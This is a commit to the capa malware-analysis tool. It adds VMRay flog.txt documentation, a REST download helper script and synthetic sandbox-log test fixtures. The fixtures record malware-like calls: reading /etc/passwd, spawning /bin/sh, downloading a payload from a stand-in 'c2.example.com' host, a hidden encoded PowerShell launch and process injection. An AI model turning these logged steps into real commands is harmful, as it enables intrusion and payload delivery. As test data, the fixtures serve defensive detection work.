vmray: add docs, fetch helper, and fixture-based regression tests for flog.txt

devs6186 · devs6186 · commit b58fbeb016a0 · 2026-02-23T16:31:29.000+05:30
Addresses reviewer feedback on #2878: 1. Document flog.txt vs full archive trade-offs in doc/usage.md with a comparison table (available features, how to obtain, file size). 2. Add scripts/fetch-vmray-flog.py — given a VMRay instance URL, API key, and sample SHA-256, downloads flog.txt via the REST API and optionally runs capa against it. 3. Add fixture-based regression tests (tests/fixtures/vmray/flog_txt/) with three representative flog.txt files: - windows_apis.flog.txt: Win32 APIs, string args with backslash paths, numeric args, multi-process - linux_syscalls.flog.txt: Linux sys_-prefixed calls (all stripped) - string_edge_cases.flog.txt: paths with spaces, UNC paths, URLs, empty tests/test_vmray_flog_txt.py gains 14 new feature-presence tests covering API, String, and Number extraction at the call scope, plus negative checks (double-backslash must not appear; sys_ prefix must not appear). Fixes #2878
diff --git a/CHANGELOG.md b/CHANGELOG.md
@@ -6,6 +6,7 @@
 
 - ghidra: support PyGhidra @mike-hunhoff #2788
 - vmray: support parsing flog.txt (Download Function Log) without full ZIP @devs6186 #2452
+- vmray: add flog.txt vs archive docs, fetch-vmray-flog.py helper, and fixture-based regression tests @devs6186 #2878
 - vmray: extract number features from whitelisted void_ptr parameters (hKey, hKeyRoot) @adeboyedn #2835
 
 ### Breaking Changes
diff --git a/doc/usage.md b/doc/usage.md
@@ -12,6 +12,36 @@ See `capa -h` for all supported arguments and usage examples.
 | [**CAPE**](https://www.mandiant.com/resources/blog/dynamic-capa-executable-behavior-cape-sandbox) | capa run on sandbox report (e.g. CAPE, VMRay ZIP or VMRay flog.txt) | Dynamic analysis of sandbox output |
 | [**Web (capa Explorer)**](https://mandiant.github.io/capa/explorer/) | Web UI (upload JSON or load from URL) | Sharing results, viewing from VirusTotal or similar |
 
+## VMRay: flog.txt vs full analysis archive
+
+When analysing VMRay output you can give capa either the full analysis **ZIP archive** or just the **flog.txt** function-log file.
+Choose based on what you have access to and what features you need.
+
+| | **flog.txt** (free, "Download Function Log") | **Full VMRay ZIP archive** |
+|-|-|-|
+| **How to obtain** | VMRay Threat Feed → Full Report → *Download Function Log* | Purchased subscription; *Download Analysis Archive* |
+| **File size** | Small text file | Large encrypted ZIP |
+| **Dynamic API calls** | ✓ | ✓ |
+| **String arguments** | ✓ (parsed from text) | ✓ (from structured XML) |
+| **Numeric arguments** | ✓ (parsed from text) | ✓ (from structured XML) |
+| **Static imports / exports** | ✗ | ✓ |
+| **PE/ELF section names** | ✗ | ✓ |
+| **Embedded file strings** | ✗ | ✓ |
+| **Base address** | ✗ | ✓ |
+| **Argument names** | ✓ (text-format `name=value`) | ✓ (structured XML) |
+
+**When to use flog.txt:** You only have access to VMRay Threat Feed without a full subscription, or you want a quick first pass using only the freely-available function log.
+
+**When to use the full archive:** You need static features (imports, exports, strings, section names) in addition to dynamic behaviour, or you want the highest-fidelity argument data.
+
+```
+# flog.txt — free, limited to dynamic API calls
+capa path/to/flog.txt
+
+# Full VMRay archive — requires subscription, richer features
+capa path/to/analysis_archive.zip
+```
+
 ## tips and tricks
 
 ### only run selected rules
diff --git a/scripts/fetch-vmray-flog.py b/scripts/fetch-vmray-flog.py
@@ -0,0 +1,270 @@
+#!/usr/bin/env python3
+# Copyright 2025 Google LLC
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+"""
+Fetch the VMRay Function Log (flog.txt) for a sample and optionally run capa against it.
+
+Given a sample SHA-256 hash and VMRay credentials, this script:
+  1. Looks up the sample on the VMRay instance.
+  2. Finds the most-recent analysis for that sample.
+  3. Downloads the flog.txt (Download Function Log) from the analysis archive.
+  4. Optionally runs capa against the downloaded file.
+
+Requirements:
+  pip install requests
+
+Usage::
+
+    python scripts/fetch-vmray-flog.py \\
+        --url  https://your-vmray.example.com \\
+        --apikey YOUR_API_KEY \\
+        --sha256 d46900384c78863420fb3e297d0a2f743cd2b6b3f7f82bf64059a168e07aceb7 \\
+        --output /tmp/sample_flog.txt
+
+    # Fetch and immediately run capa:
+    python scripts/fetch-vmray-flog.py \\
+        --url  https://your-vmray.example.com \\
+        --apikey YOUR_API_KEY \\
+        --sha256 d46900384c78863420fb3e297d0a2f743cd2b6b3f7f82bf64059a168e07aceb7 \\
+        --run-capa
+
+VMRay API reference:
+  https://docs.vmray.com/documents/api-reference/
+
+Note: this script requires a VMRay account.  The flog.txt itself is freely available
+("Download Function Log") in the VMRay Threat Feed web UI, but downloading it
+programmatically via the REST API requires valid API credentials.
+"""
+
+import argparse
+import logging
+import subprocess
+import sys
+from pathlib import Path
+
+import requests
+
+logger = logging.getLogger(__name__)
+
+# ---------------------------------------------------------------------------
+# VMRay REST API helpers
+# ---------------------------------------------------------------------------
+
+_FLOG_TXT_ARCHIVE_PATH = "logs/flog_txt"
+
+
+def _session(url: str, apikey: str) -> requests.Session:
+    """Return an authenticated requests.Session for the given VMRay instance."""
+    s = requests.Session()
+    s.headers.update(
+        {
+            "Authorization": f"api_key {apikey}",
+            "Accept": "application/json",
+        }
+    )
+    s.verify = True  # set to False only when using self-signed certificates
+    s.base_url = url.rstrip("/")  # type: ignore[attr-defined]
+    return s
+
+
+def _get(session: requests.Session, path: str, **kwargs) -> dict:
+    url = f"{session.base_url}{path}"  # type: ignore[attr-defined]
+    resp = session.get(url, **kwargs)
+    resp.raise_for_status()
+    return resp.json()
+
+
+def _get_bytes(session: requests.Session, path: str, **kwargs) -> bytes:
+    url = f"{session.base_url}{path}"  # type: ignore[attr-defined]
+    resp = session.get(url, **kwargs)
+    resp.raise_for_status()
+    return resp.content
+
+
+def lookup_sample(session: requests.Session, sha256: str) -> dict:
+    """
+    Return the VMRay sample record for the given SHA-256.
+    Raises ValueError if the sample is not found.
+    """
+    data = _get(session, f"/rest/sample/sha256/{sha256}")
+    if data.get("result") != "ok" or not data.get("data"):
+        raise ValueError(f"sample not found on VMRay instance: {sha256}")
+    # data["data"] is a list; take the first entry
+    return data["data"][0]
+
+
+def get_latest_analysis(session: requests.Session, sample_id: int) -> dict:
+    """
+    Return the most-recent finished analysis for the given VMRay sample ID.
+    Raises ValueError if no analysis is found.
+    """
+    data = _get(session, "/rest/analysis", params={"sample_id": sample_id})
+    analyses = data.get("data", [])
+    if not analyses:
+        raise ValueError(f"no analyses found for sample_id={sample_id}")
+    # Sort by analysis_id descending (newest first)
+    analyses.sort(key=lambda a: a.get("analysis_id", 0), reverse=True)
+    return analyses[0]
+
+
+def download_flog_txt(session: requests.Session, analysis_id: int) -> bytes:
+    """
+    Download the flog.txt content for the given VMRay analysis ID.
+
+    VMRay exposes the function log via the analysis archive endpoint.
+    We request only the flog_txt entry from the archive using the
+    ``file_filter`` query parameter.
+    """
+    # Try the dedicated log endpoint first (VMRay >= 2024.x)
+    try:
+        content = _get_bytes(
+            session,
+            f"/rest/analysis/{analysis_id}/export/v2/logs/flog_txt/binary",
+        )
+        if content:
+            return content
+    except requests.HTTPError:
+        pass
+
+    # Fallback: download via the analysis archive with a file filter
+    content = _get_bytes(
+        session,
+        f"/rest/analysis/{analysis_id}/archive",
+        params={"file_filter[]": _FLOG_TXT_ARCHIVE_PATH},
+    )
+    return content
+
+
+# ---------------------------------------------------------------------------
+# main
+# ---------------------------------------------------------------------------
+
+
+def main(argv=None):
+    if argv is None:
+        argv = sys.argv[1:]
+
+    parser = argparse.ArgumentParser(
+        description="Download VMRay flog.txt for a sample hash and (optionally) run capa."
+    )
+    parser.add_argument(
+        "--url",
+        required=True,
+        metavar="URL",
+        help="Base URL of your VMRay instance, e.g. https://cloud.vmray.com",
+    )
+    parser.add_argument(
+        "--apikey",
+        required=True,
+        metavar="KEY",
+        help="VMRay REST API key (Settings → API Keys).",
+    )
+    parser.add_argument(
+        "--sha256",
+        required=True,
+        metavar="SHA256",
+        help="SHA-256 hash of the sample to analyse.",
+    )
+    parser.add_argument(
+        "--output",
+        metavar="PATH",
+        help="Where to save the downloaded flog.txt.  Defaults to <sha256>_flog.txt in the current directory.",
+    )
+    parser.add_argument(
+        "--run-capa",
+        action="store_true",
+        dest="run_capa",
+        help="After downloading, run 'capa <output>' and print the results.",
+    )
+    parser.add_argument(
+        "--capa-args",
+        metavar="ARGS",
+        default="",
+        help="Extra arguments forwarded to capa (only used with --run-capa).",
+    )
+    parser.add_argument(
+        "--no-verify-ssl",
+        action="store_false",
+        dest="verify_ssl",
+        help="Disable SSL certificate verification (useful for on-premise instances with self-signed certs).",
+    )
+    parser.add_argument(
+        "-d", "--debug", action="store_true", help="Enable debug logging."
+    )
+    args = parser.parse_args(argv)
+
+    logging.basicConfig(
+        level=logging.DEBUG if args.debug else logging.INFO,
+        format="%(levelname)s: %(message)s",
+    )
+
+    output_path = Path(args.output) if args.output else Path(f"{args.sha256}_flog.txt")
+
+    session = _session(args.url, args.apikey)
+    session.verify = args.verify_ssl  # type: ignore[assignment]
+
+    # Step 1 — look up sample
+    logger.info("looking up sample %s …", args.sha256)
+    try:
+        sample = lookup_sample(session, args.sha256)
+    except (requests.HTTPError, ValueError) as exc:
+        logger.error("failed to find sample: %s", exc)
+        return 1
+
+    sample_id: int = sample["sample_id"]
+    logger.debug("found sample_id=%d", sample_id)
+
+    # Step 2 — find the latest analysis
+    logger.info("fetching analysis list for sample_id=%d …", sample_id)
+    try:
+        analysis = get_latest_analysis(session, sample_id)
+    except (requests.HTTPError, ValueError) as exc:
+        logger.error("failed to find analysis: %s", exc)
+        return 1
+
+    analysis_id: int = analysis["analysis_id"]
+    logger.debug("using analysis_id=%d", analysis_id)
+
+    # Step 3 — download flog.txt
+    logger.info("downloading flog.txt for analysis_id=%d …", analysis_id)
+    try:
+        flog_bytes = download_flog_txt(session, analysis_id)
+    except requests.HTTPError as exc:
+        logger.error("failed to download flog.txt: %s", exc)
+        return 1
+
+    if not flog_bytes:
+        logger.error(
+            "received empty response — flog.txt may not be available for this analysis"
+        )
+        return 1
+
+    output_path.write_bytes(flog_bytes)
+    logger.info("saved flog.txt → %s (%d bytes)", output_path, len(flog_bytes))
+
+    # Step 4 (optional) — run capa
+    if args.run_capa:
+        capa_cmd = ["capa", str(output_path)] + (
+            args.capa_args.split() if args.capa_args else []
+        )
+        logger.info("running: %s", " ".join(capa_cmd))
+        result = subprocess.run(capa_cmd)
+        return result.returncode
+
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())
diff --git a/tests/fixtures/vmray/flog_txt/linux_syscalls.flog.txt b/tests/fixtures/vmray/flog_txt/linux_syscalls.flog.txt
@@ -0,0 +1,43 @@
+# Log Creation Date: 02.01.2025 12:00:00
+# Analyzer Version: 2024.4.1
+# Flog Txt Version 1
+
+Process:
+id = "1"
+os_pid = "0x1234"
+os_parent_pid = "0x1"
+parent_id = "0"
+image_name = "backdoor"
+filename = "/tmp/backdoor"
+cmd_line = "/tmp/backdoor"
+monitor_reason = "analysis_target"
+
+Region:
+id = "1"
+name = "stack"
+
+Thread:
+id = "1"
+os_tid = "0x1234"
+ [0001.000] sys_read (fd=0x3, buf=0x7ffe1234, count=0x1000) returned 0x100
+ [0001.001] sys_write (fd=0x1, buf=0x7ffe1234, count=0x6) returned 0x6
+ [0001.002] sys_open (pathname="/etc/passwd", flags=0x0, mode=0x0) returned 0x3
+ [0001.003] sys_connect (sockfd=0x4, addr=0x7ffe2000, addrlen=0x10) returned 0x0
+ [0001.004] sys_socket (domain=0x2, type=0x1, protocol=0x0) returned 0x4
+ [0001.005] sys_execve (filename="/bin/sh", argv=0x7ffe3000, envp=0x7ffe4000) returned 0x0
+ [0001.006] sys_fork () returned 0x2345
+ [0001.007] sys_getuid () returned 0x0
+ [0001.008] sys_setuid (uid=0x0) returned 0x0
+ [0001.009] sys_chmod (pathname="/tmp/backdoor", mode=0x1ed) returned 0x0
+ [0001.010] sys_unlink (pathname="/tmp/.hidden") returned 0x0
+ [0001.011] sys_time (tloc=0x0) returned 0x677f2000
+ [0001.012] sys_ptrace (request=0x0, pid=0x1, addr=0x0, data=0x0) returned 0x0
+ [0001.013] sys_prctl (option=0xf, arg2=0x0, arg3=0x0, arg4=0x0, arg5=0x0) returned 0x0
+ [0001.014] sys_mmap (addr=0x0, length=0x1000, prot=0x7, flags=0x22, fd=0xffffffff, offset=0x0) returned 0x7f0000
+ [0001.015] sys_mprotect (start=0x7f0000, len=0x1000, prot=0x5) returned 0x0
+ [0001.016] sys_munmap (addr=0x7f0000, length=0x1000) returned 0x0
+ [0001.017] sys_bind (sockfd=0x4, addr=0x7ffe2000, addrlen=0x10) returned 0x0
+ [0001.018] sys_listen (sockfd=0x4, backlog=0x5) returned 0x0
+ [0001.019] sys_accept (sockfd=0x4, addr=0x7ffe2010, addrlen=0x7ffe2020) returned 0x5
+ [0001.020] sys_sendto (sockfd=0x5, buf=0x7ffe5000, len=0x20, flags=0x0, dest_addr=0x0, addrlen=0x0) returned 0x20
+ [0001.021] sys_recvfrom (sockfd=0x5, buf=0x7ffe5000, len=0x1000, flags=0x0) returned 0x40
diff --git a/tests/fixtures/vmray/flog_txt/string_edge_cases.flog.txt b/tests/fixtures/vmray/flog_txt/string_edge_cases.flog.txt
@@ -0,0 +1,37 @@
+# Log Creation Date: 03.01.2025 08:00:00
+# Analyzer Version: 2024.4.1
+# Flog Txt Version 1
+
+Process:
+id = "1"
+os_pid = "0x2000"
+os_parent_pid = "0x4"
+parent_id = "0"
+image_name = "edgecase.exe"
+filename = "c:\\users\\test\\edgecase.exe"
+cmd_line = "edgecase.exe"
+monitor_reason = "analysis_target"
+
+Region:
+id = "5"
+name = "private_0x0000000000010000"
+
+Thread:
+id = "1"
+os_tid = "0x2100"
+ [0001.000] GetCurrentProcess () returned 0xffffffffffffffff
+ [0001.001] CreateFileW (lpFileName="C:\\path with spaces\\file name.txt", dwDesiredAccess=0x40000000) returned 0x8
+ [0001.002] RegOpenKeyExW (hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019) returned 0x0
+ [0001.003] CreateFileW (lpFileName="\\\\server\\share\\document.docx", dwDesiredAccess=0x80000000) returned 0x9
+ [0001.004] CreateFileW (lpFileName="", dwDesiredAccess=0x80000000) returned 0xffffffffffffffff
+ [0001.005] OutputDebugStringA (lpOutputString="debug: value=0x1234 status=ok") returned 0x0
+ [0001.006] MessageBoxW (hWnd=0x0, lpText="An error occurred.\nPlease try again.", lpCaption="Error", uType=0x10) returned 0x1
+ [0001.007] SetEnvironmentVariableW (lpName="PATH", lpValue="C:\\Windows\\system32;C:\\Windows") returned 0x1
+ [0001.008] URLDownloadToFileW (pCaller=0x0, szURL="https://c2.example.com/payload.bin", szFileName="C:\\Users\\test\\AppData\\Local\\Temp\\payload.bin", dwReserved=0x0) returned 0x0
+ [0001.009] CryptHashData (hHash=0x100, pbData=0x1234, dwDataLen=4096, dwFlags=0x0) returned 0x1
+ [0001.010] connect (s=0x4, name=0x7ffe2000, namelen=0x10) returned 0x0
+ [0001.011] send (s=0x4, buf=0x7ffe5000, len=256, flags=0x0) returned 256
+ [0001.012] recv (s=0x4, buf=0x7ffe5000, len=4096, flags=0x0) returned 128
+ [0001.013] CreateProcessW (lpApplicationName=NULL, lpCommandLine="powershell.exe -nop -w hidden -enc BASE64PAYLOAD", dwCreationFlags=0x8000000) returned 0x1
+ [0001.014] WriteProcessMemory (hProcess=0xffffffffffffffff, lpBaseAddress=0x140001000, lpBuffer=0x1000, nSize=4096) returned 0x1
+ [0001.015] CreateRemoteThread (hProcess=0xffffffffffffffff, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x140001000, lpParameter=0x0, dwCreationFlags=0x0) returned 0x200
diff --git a/tests/fixtures/vmray/flog_txt/windows_apis.flog.txt b/tests/fixtures/vmray/flog_txt/windows_apis.flog.txt
diff --git a/tests/test_vmray_flog_txt.py b/tests/test_vmray_flog_txt.py